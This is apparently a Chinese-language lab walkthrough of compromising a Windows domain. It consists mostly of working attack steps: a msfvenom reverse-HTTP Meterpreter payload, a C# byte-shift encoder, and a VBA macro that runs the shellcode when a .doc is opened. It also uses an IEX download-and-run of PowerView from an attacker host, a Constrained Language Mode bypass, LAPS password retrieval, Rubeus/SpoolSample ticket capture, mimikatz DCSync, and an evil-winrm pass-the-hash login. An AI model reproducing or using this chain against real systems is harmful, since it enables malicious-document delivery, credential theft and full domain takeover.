目标服务器:192.168.x.120
192.168.x.121
192.168.x.122
121开启了80端口,访问发现是要上传.doc文件,写一个Office宏来get shell
1.首先用msf生成payload
msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.X.Y LPORT=8080 -f csharp
2.对生成的payload进行编码
using System;
using System.Collections.Generic;
using System.Linq; using System.Text;
using System.Threading.Tasks;
namespace EncryptVBA
{
class Program
{
static void Main(string[] args)
{
byte[] buf = new byte[640] { 你的payload };
byte[] encoded = new byte[buf.Length];
for (int i = 0; i < buf.Length; i++)
{
encoded[i] = (byte)(((uint)buf[i] + 2) & 0xFF);
}
uint counter = 0;
StringBuilder hex = new StringBuilder(encoded.Length * 2);
foreach (byte b in encoded)
{
hex.AppendFormat("{0:D}, ", b);
counter++;
if (counter % 50 == 0)
{
hex.AppendFormat("_{0}", Environment.NewLine);
}
}
Console.WriteLine("The payload is: " + hex.ToString());
}
}
}
3.将生成的编码放入Office宏中
注意:生成的文件要是.doc或.docm
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
Sub MyMacro()
Dim buf As Variant
Dim addr As LongPtr
Dim counter As Long
Dim data As Long
Dim res As Long
buf = Array(你的编码)
For i = 0 To UBound(buf)
buf(i) = buf(i) - 2
Next i
addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
For counter = LBound(buf) To UBound(buf)
data = buf(counter)
res = RtlMoveMemory(addr + counter, data, 1)
Next counter
res = CreateThread(0, 0, addr, 0, 0, 0)
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
现在我们有了Office宏,取名叫1.doc文件,将他通过网页上传
同时开启msf
得到shell后进行进程迁移,迁移到explore.exe
把文件夹切换到C:\Windows\tasks下,上传PsBypassCLM.exe
当我们尝试运行.ps1脚本时,发生报错,通过查询,发现存在受限语言模式(ConstrainedLanguageMode),接下来用Github上的脚本进行绕过,也就是我刚才提前上传的那个PsBypassCLM.exe文件。
接下来运行脚本,再来查看一次,发现绕过了,当然Clm绕过,并非这一种方法,只是这种方法实用于这台靶机。接下来使用PowerView.ps1脚本查域密码
IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.x.y/PowerView.ps1’)
Get-ADObject -Name web05 -DomainController 192.168.62.120
得到了密码ms-mcs-admpwd :S2!/[12(IO#/r(,rdesktop登录到.121,接下来要得到域管理员权限
.\PsExec64.exe -accepteula -s -i cmd.exe,切换本地管理员权限
在本地管理员权限的cmd中输入:.\Rubeus.exe monitor /interval:1
在powershell中输入:.\SpoolSample.exe AD1 AD2
会得到一串base64值
生成.ticket.kirbi文件:[IO.File]::WriteAllBytes(“绝对路径\TGS\ticket.kirbi”, [Convert]::FromBase64String(“得到的base64”))
导入:.\Rubues.exe ptt /ticket:文件名.kirbi
接下来用mimikatz
.\mimikatz.exe “privilege::debug” “lsadump::dcsync /domain:AD.com /user:administrator /csv” “exit”
会得到一串HTLM值
登录到域管理员:evil-winrm -u ad.com\administrator -H 5f9163ca3b673adfff2828f368ca3760 -i 192.168.X.120
Github项目地址
PsBypassCLM.exe:https://github.com/padovah4ck/PSByPassCLM
PowerView.ps1:https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1